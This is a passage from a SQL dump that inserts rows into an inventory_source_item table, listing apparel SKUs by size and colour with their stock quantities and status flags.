(768, 'default', 'MP02-36-Red', 100.0000, 1),
(769, 'default', 'MP02', 0.0000, 1),
(770, 'default', 'MP03-32-Blue', 100.0000, 1),
(771, 'default', 'MP03-32-Green', 100.0000, 1),
(772, 'default', 'MP03-32-Red', 100.0000, 1),
(773, 'default', 'MP03-33-Blue', 100.0000, 1),
(774, 'default', 'MP03-33-Green', 100.0000, 1),
(775, 'default', 'MP03-33-Red', 100.0000, 1),
(776, 'default', 'MP03-34-Blue', 100.0000, 1),
(777, 'default', 'MP03-34-Green', 100.0000, 1),
(778, 'default', 'MP03-34-Red', 100.0000, 1),
(779, 'default', 'MP03-36-Blue', 100.0000, 1),
(780, 'default', 'MP03-36-Green', 100.0000, 1),
(781, 'default', 'MP03-36-Red', 100.0000, 1),
(782, 'default', 'MP03', 0.0000, 1),
(783, 'default', 'MP04-32-Black', 100.0000, 1),
(784, 'default', 'MP04-32-Gray', 100.0000, 1),
(785, 'default', 'MP04-32-Green', 100.0000, 1),
(786, 'default', 'MP04-33-Black', 100.0000, 1),
(787, 'default', 'MP04-33-Gray', 100.0000, 1),
(788, 'default', 'MP04-33-Green', 100.0000, 1),
(789, 'default', 'MP04-34-Black', 100.0000, 1),
(790, 'default', 'MP04-34-Gray', 100.0000, 1),
(791, 'default', 'MP04-34-Green', 100.0000, 1),
(792, 'default', 'MP04-36-Black', 100.0000, 1),
(793, 'default', 'MP04-36-Gray', 100.0000, 1),
(794, 'default', 'MP04-36-Green', 100.0000, 1),
(795, 'default', 'MP04', 0.0000, 1),
(796, 'default', 'MP05-32-Black', 100.0000, 1),
(797, 'default', 'MP05-32-Blue', 100.0000, 1),
(798, 'default', 'MP05-32-Green', 100.0000, 1),
(799, 'default', 'MP05-33-Black', 100.0000, 1),
(800, 'default', 'MP05-33-Blue', 100.0000, 1),
(801, 'default', 'MP05-33-Green', 100.0000, 1),
(802, 'default', 'MP05-34-Black', 100.0000, 1),
(803, 'default', 'MP05-34-Blue', 100.0000, 1),
(804, 'default', 'MP05-34-Green', 100.0000, 1),
(805, 'default', 'MP05-36-Black', 100.0000, 1),
(806, 'default', 'MP05-36-Blue', 100.0000, 1),
(807, 'default', 'MP05-36-Green', 100.0000, 1),
(808, 'default', 'MP05', 0.0000, 1),
(809, 'default', 'MP06-32-Gray', 100.0000, 1),
(810, 'default', 'MP06-32-Green', 100.0000, 1),
(811, 'default', 'MP06-32-Orange', 100.0000, 1),
(812, 'default', 'MP06-33-Gray', 100.0000, 1),
(813, 'default', 'MP06-33-Green', 100.0000, 1),
(814, 'default', 'MP06-33-Orange', 100.0000, 1),
(815, 'default', 'MP06-34-Gray', 100.0000, 1),
(816, 'default', 'MP06-34-Green', 100.0000, 1),
(817, 'default', 'MP06-34-Orange', 100.0000, 1),
(818, 'default', 'MP06-36-Gray', 100.0000, 1),
(819, 'default', 'MP06-36-Green', 100.0000, 1),
(820, 'default', 'MP06-36-Orange', 100.0000, 1),
(821, 'default', 'MP06', 0.0000, 1),
(822, 'default', 'MP07-32-Black', 100.0000, 1),
(823, 'default', 'MP07-32-Blue', 100.0000, 1),
(824, 'default', 'MP07-32-Purple', 100.0000, 1),
(825, 'default', 'MP07-33-Black', 100.0000, 1),
(826, 'default', 'MP07-33-Blue', 100.0000, 1),
(827, 'default', 'MP07-33-Purple', 100.0000, 1),
(828, 'default', 'MP07-34-Black', 100.0000, 1),
(829, 'default', 'MP07-34-Blue', 100.0000, 1),
(830, 'default', 'MP07-34-Purple', 100.0000, 1),
(831, 'default', 'MP07-36-Black', 100.0000, 1),
(832, 'default', 'MP07-36-Blue', 100.0000, 1),
(833, 'default', 'MP07-36-Purple', 100.0000, 1),
(834, 'default', 'MP07', 0.0000, 1),
(835, 'default', 'MP08-32-Blue', 100.0000, 1),
(836, 'default', 'MP08-32-Green', 100.0000, 1),
(837, 'default', 'MP08-32-Red', 100.0000, 1),
(838, 'default', 'MP08-33-Blue', 100.0000, 1),
(839, 'default', 'MP08-33-Green', 100.0000, 1),
(840, 'default', 'MP08-33-Red', 100.0000, 1),
(841, 'default', 'MP08-34-Blue', 100.0000, 1),
(842, 'default', 'MP08-34-Green', 100.0000, 1),
(843, 'default', 'MP08-34-Red', 100.0000, 1),
(844, 'default', 'MP08-36-Blue', 100.0000, 1),
(845, 'default', 'MP08-36-Green', 100.0000, 1),
(846, 'default', 'MP08-36-Red', 100.0000, 1),
(847, 'default', 'MP08', 0.0000, 1),
(848, 'default', 'MP09-32-Black', 100.0000, 1),
(849, 'default', 'MP09-32-Blue', 100.0000, 1),
(850, 'default', 'MP09-32-Red', 100.0000, 1),
(851, 'default', 'MP09-33-Black', 100.0000, 1),
(852, 'default', 'MP09-33-Blue', 100.0000, 1),
(853, 'default', 'MP09-33-Red', 100.0000, 1),
(854, 'default', 'MP09-34-Black', 100.0000, 1),
(855, 'default', 'MP09-34-Blue', 100.0000, 1),
(856, 'default', 'MP09-34-Red', 100.0000, 1),
(857, 'default', 'MP09-36-Black', 100.0000, 1),
(858, 'default', 'MP09-36-Blue', 100.0000, 1),
(859, 'default', 'MP09-36-Red', 100.0000, 1),
(860, 'default', 'MP09', 0.0000, 1),
(861, 'default', 'MP10-32-Black', 100.0000, 1),
(862, 'default', 'MP10-32-Blue', 100.0000, 1),
(863, 'default', 'MP10-32-Green', 100.0000, 1),
(864, 'default', 'MP10-33-Black', 100.0000, 1),
(865, 'default', 'MP10-33-Blue', 100.0000, 1),
(866, 'default', 'MP10-33-Green', 100.0000, 1),
(867, 'default', 'MP10-34-Black', 100.0000, 1),
(868, 'default', 'MP10-34-Blue', 100.0000, 1),
(869, 'default', 'MP10-34-Green', 100.0000, 1),
(870, 'default', 'MP10-36-Black', 100.0000, 1),
(871, 'default', 'MP10-36-Blue', 100.0000, 1),
(872, 'default', 'MP10-36-Green', 100.0000, 1),
(873, 'default', 'MP10', 0.0000, 1),
(874, 'default', 'MP11-32-Blue', 100.0000, 1),
(875, 'default', 'MP11-32-Brown', 100.0000, 1),
(876, 'default', 'MP11-32-Green', 100.0000, 1),
(877, 'default', 'MP11-33-Blue', 100.0000, 1),
(878, 'default', 'MP11-33-Brown', 100.0000, 1),
(879, 'default', 'MP11-33-Green', 100.0000, 1),
(880, 'default', 'MP11-34-Blue', 100.0000, 1),
(881, 'default', 'MP11-34-Brown', 100.0000, 1),
(882, 'default', 'MP11-34-Green', 100.0000, 1),
(883, 'default', 'MP11-36-Blue', 100.0000, 1),
(884, 'default', 'MP11-36-Brown', 100.0000, 1),
(885, 'default', 'MP11-36-Green', 100.0000, 1),
(886, 'default', 'MP11', 0.0000, 1),
(887, 'default', 'MP12-32-Black', 100.0000, 1),
(888, 'default', 'MP12-32-Blue', 100.0000, 1),
(889, 'default', 'MP12-32-Red', 100.0000, 1),
(890, 'default', 'MP12-33-Black', 100.0000, 1),
(891, 'default', 'MP12-33-Blue', 100.0000, 1),
(892, 'default', 'MP12-33-Red', 100.0000, 1),
(893, 'default', 'MP12-34-Black', 100.0000, 1),
(894, 'default', 'MP12-34-Blue', 100.0000, 1),
(895, 'default', 'MP12-34-Red', 100.0000, 1),
(896, 'default', 'MP12-36-Black', 100.0000, 1),
(897, 'default', 'MP12-36-Blue', 100.0000, 1),
(898, 'default', 'MP12-36-Red', 100.0000, 1),
(899, 'default', 'MP12', 0.0000, 1),
(900, 'default', 'MSH01-32-Black', 100.0000, 1),
(901, 'default', 'MSH01-32-Blue', 100.0000, 1),
(902, 'default', 'MSH01-32-Red', 100.0000, 1),
(903, 'default', 'MSH01-33-Black', 100.0000, 1),
(904, 'default', 'MSH01-33-Blue', 100.0000, 1),
(905, 'default', 'MSH01-33-Red', 100.0000, 1),
(906, 'default', 'MSH01-34-Black', 100.0000, 1),
(907, 'default', 'MSH01-34-Blue', 100.0000, 1),
(908, 'default', 'MSH01-34-Red', 100.0000, 1),
(909, 'default', 'MSH01-36-Black', 100.0000, 1),
(910, 'default', 'MSH01-36-Blue', 100.0000, 1),
(911, 'default', 'MSH01-36-Red', 100.0000, 1),
(912, 'default', 'MSH01', 0.0000, 1),
(913, 'default', 'MSH02-32-Black', 100.0000, 1),
(914, 'default', 'MSH02-33-Black', 100.0000, 1),
(915, 'default', 'MSH02-34-Black', 100.0000, 1),
(916, 'default', 'MSH02-36-Black', 100.0000, 1),
(917, 'default', 'MSH02', 0.0000, 1),
(918, 'default', 'MSH03-32-Black', 100.0000, 1),
(919, 'default', 'MSH03-32-Blue', 100.0000, 1),
(920, 'default', 'MSH03-32-Green', 100.0000, 1),
(921, 'default', 'MSH03-33-Black', 100.0000, 1),
(922, 'default', 'MSH03-33-Blue', 100.0000, 1),
(923, 'default', 'MSH03-33-Green', 100.0000, 1),
(924, 'default', 'MSH03-34-Black', 100.0000, 1),
(925, 'default', 'MSH03-34-Blue', 100.0000, 1),
(926, 'default', 'MSH03-34-Green', 100.0000, 1),
(927, 'default', 'MSH03-36-Black', 100.0000, 1),
(928, 'default', 'MSH03-36-Blue', 100.0000, 1),
(929, 'default', 'MSH03-36-Green', 100.0000, 1),
(930, 'default', 'MSH03', 0.0000, 1),
(931, 'default', 'MSH04-32-Gray', 100.0000, 1),
(932, 'default', 'MSH04-32-Purple', 100.0000, 1),
(933, 'default', 'MSH04-32-Yellow', 100.0000, 1),
(934, 'default', 'MSH04-33-Gray', 100.0000, 1),
(935, 'default', 'MSH04-33-Purple', 100.0000, 1),
(936, 'default', 'MSH04-33-Yellow', 100.0000, 1),
(937, 'default', 'MSH04-34-Gray', 100.0000, 1),
(938, 'default', 'MSH04-34-Purple', 100.0000, 1),
(939, 'default', 'MSH04-34-Yellow', 100.0000, 1),
(940, 'default', 'MSH04-36-Gray', 100.0000, 1),
(941, 'default', 'MSH04-36-Purple', 100.0000, 1),
(942, 'default', 'MSH04-36-Yellow', 100.0000, 1),
(943, 'default', 'MSH04', 0.0000, 1),
(944, 'default', 'MSH05-32-Black', 100.0000, 1),
(945, 'default', 'MSH05-32-Blue', 100.0000, 1),
(946, 'default', 'MSH05-32-Gray', 100.0000, 1),
(947, 'default', 'MSH05-33-Black', 100.0000, 1),
(948, 'default', 'MSH05-33-Blue', 100.0000, 1),
(949, 'default', 'MSH05-33-Gray', 100.0000, 1),
(950, 'default', 'MSH05-34-Black', 100.0000, 1),
(951, 'default', 'MSH05-34-Blue', 100.0000, 1),
(952, 'default', 'MSH05-34-Gray', 100.0000, 1),
(953, 'default', 'MSH05-36-Black', 100.0000, 1),
(954, 'default', 'MSH05-36-Blue', 100.0000, 1),
(955, 'default', 'MSH05-36-Gray', 100.0000, 1),
(956, 'default', 'MSH05', 0.0000, 1),
(957, 'default', 'MSH06-32-Blue', 100.0000, 1),
(958, 'default', 'MSH06-32-Gray', 100.0000, 1),
(959, 'default', 'MSH06-32-Red', 100.0000, 1),
(960, 'default', 'MSH06-33-Blue', 100.0000, 1),
(961, 'default', 'MSH06-33-Gray', 100.0000, 1),
(962, 'default', 'MSH06-33-Red', 100.0000, 1),
(963, 'default', 'MSH06-34-Blue', 100.0000, 1),
(964, 'default', 'MSH06-34-Gray', 100.0000, 1),
(965, 'default', 'MSH06-34-Red', 100.0000, 1),
(966, 'default', 'MSH06-36-Blue', 100.0000, 1),
(967, 'default', 'MSH06-36-Gray', 100.0000, 1),
(968, 'default', 'MSH06-36-Red', 100.0000, 1),
(969, 'default', 'MSH06', 0.0000, 1),
(970, 'default', 'MSH07-32-Black', 100.0000, 1),
(971, 'default', 'MSH07-32-Blue', 100.0000, 1),
(972, 'default', 'MSH07-32-Purple', 100.0000, 1),
(973, 'default', 'MSH07-33-Black', 100.0000, 1),
(974, 'default', 'MSH07-33-Blue', 100.0000, 1),
(975, 'default', 'MSH07-33-Purple', 100.0000, 1),
(976, 'default', 'MSH07-34-Black', 100.0000, 1),
(977, 'default', 'MSH07-34-Blue', 100.0000, 1),
(978, 'default', 'MSH07-34-Purple', 100.0000, 1),
(979, 'default', 'MSH07-36-Black', 100.0000, 1),
(980, 'default', 'MSH07-36-Blue', 100.0000, 1),
(981, 'default', 'MSH07-36-Purple', 100.0000, 1),
(982, 'default', 'MSH07', 0.0000, 1),
(983, 'default', 'MSH08-32-Black', 100.0000, 1),
(984, 'default', 'MSH08-32-Blue', 100.0000, 1),
(985, 'default', 'MSH08-32-Green', 100.0000, 1),
(986, 'default', 'MSH08-33-Black', 100.0000, 1),
(987, 'default', 'MSH08-33-Blue', 100.0000, 1),
(988, 'default', 'MSH08-33-Green', 100.0000, 1),
(989, 'default', 'MSH08-34-Black', 100.0000, 1),
(990, 'default', 'MSH08-34-Blue', 100.0000, 1),
(991, 'default', 'MSH08-34-Green', 100.0000, 1),
(992, 'default', 'MSH08-36-Black', 100.0000, 1),
(993, 'default', 'MSH08-36-Blue', 100.0000, 1),
(994, 'default', 'MSH08-36-Green', 100.0000, 1),
(995, 'default', 'MSH08', 0.0000, 1),
(996, 'default', 'MSH09-32-Black', 100.0000, 1),
(997, 'default', 'MSH09-32-Blue', 100.0000, 1),
(998, 'default', 'MSH09-32-Green', 100.0000, 1),
(999, 'default', 'MSH09-33-Black', 100.0000, 1),
(1000, 'default', 'MSH09-33-Blue', 100.0000, 1),
(1001, 'default', 'MSH09-33-Green', 100.0000, 1),
(1002, 'default', 'MSH09-34-Black', 100.0000, 1),
(1003, 'default', 'MSH09-34-Blue', 100.0000, 1),
(1004, 'default', 'MSH09-34-Green', 100.0000, 1),
(1005, 'default', 'MSH09-36-Black', 100.0000, 1),
(1006, 'default', 'MSH09-36-Blue', 100.0000, 1),
(1007, 'default', 'MSH09-36-Green', 100.0000, 1),
(1008, 'default', 'MSH09', 0.0000, 1),
(1009, 'default', 'MSH10-32-Blue', 100.0000, 1),
(1010, 'default', 'MSH10-32-Green', 100.0000, 1),
(1011, 'default', 'MSH10-32-Purple', 100.0000, 1),
(1012, 'default', 'MSH10-33-Blue', 100.0000, 1),
(1013, 'default', 'MSH10-33-Green', 100.0000, 1),
(1014, 'default', 'MSH10-33-Purple', 100.0000, 1),
(1015, 'default', 'MSH10-34-Blue', 100.0000, 1),
(1016, 'default', 'MSH10-34-Green', 100.0000, 1),
(1017, 'default', 'MSH10-34-Purple', 100.0000, 1),
(1018, 'default', 'MSH10-36-Blue', 100.0000, 1),
(1019, 'default', 'MSH10-36-Green', 100.0000, 1),
(1020, 'default', 'MSH10-36-Purple', 100.0000, 1),
(1021, 'default', 'MSH10', 0.0000, 1),
(1022, 'default', 'MSH11-32-Black', 100.0000, 1),
(1023, 'default', 'MSH11-32-Blue', 100.0000, 1),
(1024, 'default', 'MSH11-32-Red', 100.0000, 1),
(1025, 'default', 'MSH11-33-Black', 100.0000, 1),
(1026, 'default', 'MSH11-33-Blue', 100.0000, 1),
(1027, 'default', 'MSH11-33-Red', 100.0000, 1),
(1028, 'default', 'MSH11-34-Black', 100.0000, 1),
(1029, 'default', 'MSH11-34-Blue', 100.0000, 1),
(1030, 'default', 'MSH11-34-Red', 100.0000, 1),
(1031, 'default', 'MSH11-36-Black', 100.0000, 1),
(1032, 'default', 'MSH11-36-Blue', 100.0000, 1),
(1033, 'default', 'MSH11-36-Red', 100.0000, 1),
(1034, 'default', 'MSH11', 0.0000, 1),
(1035, 'default', 'MSH12-32-Black', 100.0000, 1),
(1036, 'default', 'MSH12-32-Gray', 100.0000, 1),
(1037, 'default', 'MSH12-32-Red', 100.0000, 1),
(1038, 'default', 'MSH12-33-Black', 100.0000, 1),
(1039, 'default', 'MSH12-33-Gray', 100.0000, 1),
(1040, 'default', 'MSH12-33-Red', 100.0000, 1),
(1041, 'default', 'MSH12-34-Black', 100.0000, 1),
(1042, 'default', 'MSH12-34-Gray', 100.0000, 1),
(1043, 'default', 'MSH12-34-Red', 100.0000, 1),
(1044, 'default', 'MSH12-36-Black', 100.0000, 1),
(1045, 'default', 'MSH12-36-Gray', 100.0000, 1),
(1046, 'default', 'MSH12-36-Red', 100.0000, 1),
(1047, 'default', 'MSH12', 0.0000, 1),
(1048, 'default', 'WH01-XS-Green', 100.0000, 1),
(1049, 'default', 'WH01-XS-Orange', 100.0000, 1),
(1050, 'default', 'WH01-XS-Purple', 100.0000, 1),
(1051, 'default', 'WH01-S-Green', 100.0000, 1),
(1052, 'default', 'WH01-S-Orange', 100.0000, 1),
(1053, 'default', 'WH01-S-Purple', 100.0000, 1),
(1054, 'default', 'WH01-M-Green', 100.0000, 1),
(1055, 'default', 'WH01-M-Orange', 100.0000, 1),
(1056, 'default', 'WH01-M-Purple', 100.0000, 1),
(1057, 'default', 'WH01-L-Green', 100.0000, 1),
(1058, 'default', 'WH01-L-Orange', 100.0000, 1),
(1059, 'default', 'WH01-L-Purple', 100.0000, 1),
(1060, 'default', 'WH01-XL-Green', 100.0000, 1),
(1061, 'default', 'WH01-XL-Orange', 100.0000, 1),
(1062, 'default', 'WH01-XL-Purple', 100.0000, 1),
(1063, 'default', 'WH01', 0.0000, 1),
(1064, 'default', 'WH02-XS-Blue', 100.0000, 1),
(1065, 'default', 'WH02-XS-Green', 100.0000, 1),
(1066, 'default', 'WH02-XS-Orange', 100.0000, 1),
(1067, 'default', 'WH02-S-Blue', 100.0000, 1),
(1068, 'default', 'WH02-S-Green', 100.0000, 1),
(1069, 'default', 'WH02-S-Orange', 100.0000, 1),
(1070, 'default', 'WH02-M-Blue', 100.0000, 1),
(1071, 'default', 'WH02-M-Green', 100.0000, 1),
(1072, 'default', 'WH02-M-Orange', 100.0000, 1),
(1073, 'default', 'WH02-L-Blue', 100.0000, 1),
(1074, 'default', 'WH02-L-Green', 100.0000, 1),
(1075, 'default', 'WH02-L-Orange', 100.0000, 1),
(1076, 'default', 'WH02-XL-Blue', 100.0000, 1),
(1077, 'default', 'WH02-XL-Green', 100.0000, 1),
(1078, 'default', 'WH02-XL-Orange', 100.0000, 1),
(1079, 'default', 'WH02', 0.0000, 1),
(1080, 'default', 'WH03-XS-Green', 100.0000, 1),
(1081, 'default', 'WH03-XS-Purple', 100.0000, 1),
(1082, 'default', 'WH03-XS-Red', 100.0000, 1),
(1083, 'default', 'WH03-S-Green', 100.0000, 1),
(1084, 'default', 'WH03-S-Purple', 100.0000, 1),
(1085, 'default', 'WH03-S-Red', 100.0000, 1),
(1086, 'default', 'WH03-M-Green', 100.0000, 1),
(1087, 'default', 'WH03-M-Purple', 100.0000, 1),
(1088, 'default', 'WH03-M-Red', 100.0000, 1),
(1089, 'default', 'WH03-L-Green', 100.0000, 1),
(1090, 'default', 'WH03-L-Purple', 100.0000, 1),
(1091, 'default', 'WH03-L-Red', 100.0000, 1),
(1092, 'default', 'WH03-XL-Green', 100.0000, 1),
(1093, 'default', 'WH03-XL-Purple', 100.0000, 1),
(1094, 'default', 'WH03-XL-Red', 100.0000, 1),
(1095, 'default', 'WH03', 0.0000, 1),
(1096, 'default', 'WH04-XS-Blue', 100.0000, 1),
(1097, 'default', 'WH04-XS-Orange', 100.0000, 1),
(1098, 'default', 'WH04-XS-Purple', 100.0000, 1),
(1099, 'default', 'WH04-S-Blue', 100.0000, 1),
(1100, 'default', 'WH04-S-Orange', 100.0000, 1),
(1101, 'default', 'WH04-S-Purple', 100.0000, 1),
(1102, 'default', 'WH04-M-Blue', 100.0000, 1),
(1103, 'default', 'WH04-M-Orange', 100.0000, 1),
(1104, 'default', 'WH04-M-Purple', 100.0000, 1),
(1105, 'default', 'WH04-L-Blue', 100.0000, 1),
(1106, 'default', 'WH04-L-Orange', 100.0000, 1),
(1107, 'default', 'WH04-L-Purple', 100.0000, 1),
(1108, 'default', 'WH04-XL-Blue', 100.0000, 1),
(1109, 'default', 'WH04-XL-Orange', 100.0000, 1),
(1110, 'default', 'WH04-XL-Purple', 100.0000, 1),
(1111, 'default', 'WH04', 0.0000, 1),
(1112, 'default', 'WH05-XS-Orange', 100.0000, 1),
(1113, 'default', 'WH05-XS-Purple', 100.0000, 1),
(1114, 'default', 'WH05-XS-White', 100.0000, 1),
(1115, 'default', 'WH05-S-Orange', 100.0000, 1),
(1116, 'default', 'WH05-S-Purple', 100.0000, 1),
(1117, 'default', 'WH05-S-White', 100.0000, 1),
(1118, 'default', 'WH05-M-Orange', 100.0000, 1),
(1119, 'default', 'WH05-M-Purple', 100.0000, 1),
(1120, 'default', 'WH05-M-White', 100.0000, 1),
(1121, 'default', 'WH05-L-Orange', 100.0000, 1),
(1122, 'default', 'WH05-L-Purple', 100.0000, 1),
(1123, 'default', 'WH05-L-White', 100.0000, 1),
(1124, 'default', 'WH05-XL-Orange', 100.0000, 1),
(1125, 'default', 'WH05-XL-Purple', 100.0000, 1),
(1126, 'default', 'WH05-XL-White', 100.0000, 1),
(1127, 'default', 'WH05', 0.0000, 1),
(1128, 'default', 'WH06-XS-Purple', 100.0000, 1),
(1129, 'default', 'WH06-S-Purple', 100.0000, 1),
(1130, 'default', 'WH06-M-Purple', 100.0000, 1),
(1131, 'default', 'WH06-L-Purple', 100.0000, 1),
(1132, 'default', 'WH06-XL-Purple', 100.0000, 1),
(1133, 'default', 'WH06', 0.0000, 1),
(1134, 'default', 'WH07-XS-Gray', 100.0000, 1);
INSERT INTO `inventory_source_item` (`source_item_id`, `source_code`, `sku`, `quantity`, `status`) VALUES
(1135, 'default', 'WH07-XS-Purple', 100.0000, 1),
(1136, 'default', 'WH07-XS-White', 100.0000, 1),
(1137, 'default', 'WH07-S-Gray', 100.0000, 1),
(1138, 'default', 'WH07-S-Purple', 100.0000, 1),
(1139, 'default', 'WH07-S-White', 100.0000, 1),
(1140, 'default', 'WH07-M-Gray', 100.0000, 1),
(1141, 'default', 'WH07-M-Purple', 100.0000, 1),
(1142, 'default', 'WH07-M-White', 100.0000, 1),
(1143, 'default', 'WH07-L-Gray', 100.0000, 1),
(1144, 'default', 'WH07-L-Purple', 100.0000, 1),
(1145, 'default', 'WH07-L-White', 100.0000, 1),
(1146, 'default', 'WH07-XL-Gray', 100.0000, 1),
(1147, 'default', 'WH07-XL-Purple', 100.0000, 1),
(1148, 'default', 'WH07-XL-White', 100.0000, 1),
(1149, 'default', 'WH07', 0.0000, 1),
(1150, 'default', 'WH08-XS-Orange', 100.0000, 1),
(1151, 'default', 'WH08-XS-Purple', 100.0000, 1),
(1152, 'default', 'WH08-XS-White', 100.0000, 1),
(1153, 'default', 'WH08-S-Orange', 100.0000, 1),
(1154, 'default', 'WH08-S-Purple', 100.0000, 1),
(1155, 'default', 'WH08-S-White', 100.0000, 1),
(1156, 'default', 'WH08-M-Orange', 100.0000, 1),
(1157, 'default', 'WH08-M-Purple', 100.0000, 1),
(1158, 'default', 'WH08-M-White', 100.0000, 1),
(1159, 'default', 'WH08-L-Orange', 100.0000, 1),
(1160, 'default', 'WH08-L-Purple', 100.0000, 1),
(1161, 'default', 'WH08-L-White', 100.0000, 1),
(1162, 'default', 'WH08-XL-Orange', 100.0000, 1),
(1163, 'default', 'WH08-XL-Purple', 100.0000, 1),
(1164, 'default', 'WH08-XL-White', 100.0000, 1),
(1165, 'default', 'WH08', 0.0000, 1),
(1166, 'default', 'WH09-XS-Green', 100.0000, 1),
(1167, 'default', 'WH09-XS-Purple', 100.0000, 1),
(1168, 'default', 'WH09-XS-Red', 100.0000, 1),
(1169, 'default', 'WH09-S-Green', 100.0000, 1),
(1170, 'default', 'WH09-S-Purple', 100.0000, 1),
(1171, 'default', 'WH09-S-Red', 100.0000, 1),
(1172, 'default', 'WH09-M-Green', 100.0000, 1),
(1173, 'default', 'WH09-M-Purple', 100.0000, 1),
(1174, 'default', 'WH09-M-Red', 100.0000, 1),
(1175, 'default', 'WH09-L-Green', 100.0000, 1),
(1176, 'default', 'WH09-L-Purple', 100.0000, 1),
(1177, 'default', 'WH09-L-Red', 100.0000, 1),
(1178, 'default', 'WH09-XL-Green', 100.0000, 1),
(1179, 'default', 'WH09-XL-Purple', 100.0000, 1),
(1180, 'default', 'WH09-XL-Red', 100.0000, 1),
(1181, 'default', 'WH09', 0.0000, 1),
(1182, 'default', 'WH10-XS-Blue', 100.0000, 1),
(1183, 'default', 'WH10-XS-Gray', 100.0000, 1),
(1184, 'default', 'WH10-XS-Yellow', 100.0000, 1),
(1185, 'default', 'WH10-S-Blue', 100.0000, 1),
(1186, 'default', 'WH10-S-Gray', 100.0000, 1),
(1187, 'default', 'WH10-S-Yellow', 100.0000, 1),
(1188, 'default', 'WH10-M-Blue', 100.0000, 1),
(1189, 'default', 'WH10-M-Gray', 100.0000, 1),
(1190, 'default', 'WH10-M-Yellow', 100.0000, 1),
(1191, 'default', 'WH10-L-Blue', 100.0000, 1),
(1192, 'default', 'WH10-L-Gray', 100.0000, 1),
(1193, 'default', 'WH10-L-Yellow', 100.0000, 1),
(1194, 'default', 'WH10-XL-Blue', 100.0000, 1),
(1195, 'default', 'WH10-XL-Gray', 100.0000, 1),
(1196, 'default', 'WH10-XL-Yellow', 100.0000, 1),
(1197, 'default', 'WH10', 0.0000, 1),
(1198, 'default', 'WH11-XS-Blue', 100.0000, 1),
(1199, 'default', 'WH11-XS-Green', 100.0000, 1),
(1200, 'default', 'WH11-XS-Orange', 100.0000, 1),
(1201, 'default', 'WH11-S-Blue', 100.0000, 1),
(1202, 'default', 'WH11-S-Green', 100.0000, 1),
(1203, 'default', 'WH11-S-Orange', 100.0000, 1),
(1204, 'default', 'WH11-M-Blue', 100.0000, 1),
(1205, 'default', 'WH11-M-Green', 100.0000, 1),
(1206, 'default', 'WH11-M-Orange', 100.0000, 1),
(1207, 'default', 'WH11-L-Blue', 100.0000, 1),
(1208, 'default', 'WH11-L-Green', 100.0000, 1),
(1209, 'default', 'WH11-L-Orange', 100.0000, 1),
(1210, 'default', 'WH11-XL-Blue', 100.0000, 1),
(1211, 'default', 'WH11-XL-Green', 100.0000, 1),
(1212, 'default', 'WH11-XL-Orange', 100.0000, 1),
(1213, 'default', 'WH11', 0.0000, 1),
(1214, 'default', 'WH12-XS-Gray', 100.0000, 1),
(1215, 'default', 'WH12-XS-Green', 100.0000, 1),
(1216, 'default', 'WH12-XS-Purple', 100.0000, 1),
(1217, 'default', 'WH12-S-Gray', 100.0000, 1),
(1218, 'default', 'WH12-S-Green', 100.0000, 1),
(1219, 'default', 'WH12-S-Purple', 100.0000, 1),
(1220, 'default', 'WH12-M-Gray', 100.0000, 1),
(1221, 'default', 'WH12-M-Green', 100.0000, 1),
(1222, 'default', 'WH12-M-Purple', 100.0000, 1),
(1223, 'default', 'WH12-L-Gray', 100.0000, 1),
(1224, 'default', 'WH12-L-Green', 100.0000, 1),
(1225, 'default', 'WH12-L-Purple', 100.0000, 1),
(1226, 'default', 'WH12-XL-Gray', 100.0000, 1),
(1227, 'default', 'WH12-XL-Green', 100.0000, 1),
(1228, 'default', 'WH12-XL-Purple', 100.0000, 1),
(1229, 'default', 'WH12', 0.0000, 1),
(1230, 'default', 'WJ01-S-Blue', 100.0000, 1),
(1231, 'default', 'WJ01-S-Red', 100.0000, 1),
(1232, 'default', 'WJ01-S-Yellow', 100.0000, 1),
(1233, 'default', 'WJ01-M-Blue', 100.0000, 1),
(1234, 'default', 'WJ01-M-Red', 100.0000, 1),
(1235, 'default', 'WJ01-M-Yellow', 100.0000, 1),
(1236, 'default', 'WJ01-L-Blue', 100.0000, 1),
(1237, 'default', 'WJ01-L-Red', 100.0000, 1),
(1238, 'default', 'WJ01-L-Yellow', 100.0000, 1),
(1239, 'default', 'WJ01', 0.0000, 1),
(1240, 'default', 'WJ02-XS-Black', 100.0000, 1),
(1241, 'default', 'WJ02-XS-Blue', 100.0000, 1),
(1242, 'default', 'WJ02-XS-Gray', 100.0000, 1),
(1243, 'default', 'WJ02-S-Black', 100.0000, 1),
(1244, 'default', 'WJ02-S-Blue', 100.0000, 1),
(1245, 'default', 'WJ02-S-Gray', 100.0000, 1),
(1246, 'default', 'WJ02-M-Black', 100.0000, 1),
(1247, 'default', 'WJ02-M-Blue', 100.0000, 1),
(1248, 'default', 'WJ02-M-Gray', 100.0000, 1),
(1249, 'default', 'WJ02-L-Black', 100.0000, 1),
(1250, 'default', 'WJ02-L-Blue', 100.0000, 1),
(1251, 'default', 'WJ02-L-Gray', 100.0000, 1),
(1252, 'default', 'WJ02-XL-Black', 100.0000, 1),
(1253, 'default', 'WJ02-XL-Blue', 100.0000, 1),
(1254, 'default', 'WJ02-XL-Gray', 100.0000, 1),
(1255, 'default', 'WJ02', 0.0000, 1),
(1256, 'default', 'WJ03-XS-Blue', 100.0000, 1),
(1257, 'default', 'WJ03-XS-Orange', 100.0000, 1),
(1258, 'default', 'WJ03-XS-Red', 100.0000, 1),
(1259, 'default', 'WJ03-S-Blue', 100.0000, 1),
(1260, 'default', 'WJ03-S-Orange', 100.0000, 1),
(1261, 'default', 'WJ03-S-Red', 100.0000, 1),
(1262, 'default', 'WJ03-M-Blue', 100.0000, 1),
(1263, 'default', 'WJ03-M-Orange', 100.0000, 1),
(1264, 'default', 'WJ03-M-Red', 100.0000, 1),
(1265, 'default', 'WJ03-L-Blue', 100.0000, 1),
(1266, 'default', 'WJ03-L-Orange', 100.0000, 1),
(1267, 'default', 'WJ03-L-Red', 100.0000, 1),
(1268, 'default', 'WJ03-XL-Blue', 100.0000, 1),
(1269, 'default', 'WJ03-XL-Orange', 100.0000, 1),
(1270, 'default', 'WJ03-XL-Red', 100.0000, 1),
(1271, 'default', 'WJ03', 0.0000, 1),
(1272, 'default', 'WJ04-XS-Orange', 100.0000, 1),
(1273, 'default', 'WJ04-XS-Red', 100.0000, 1),
(1274, 'default', 'WJ04-XS-White', 100.0000, 1),
(1275, 'default', 'WJ04-S-Orange', 100.0000, 1),
(1276, 'default', 'WJ04-S-Red', 100.0000, 1),
(1277, 'default', 'WJ04-S-White', 100.0000, 1),
(1278, 'default', 'WJ04-M-Orange', 100.0000, 1),
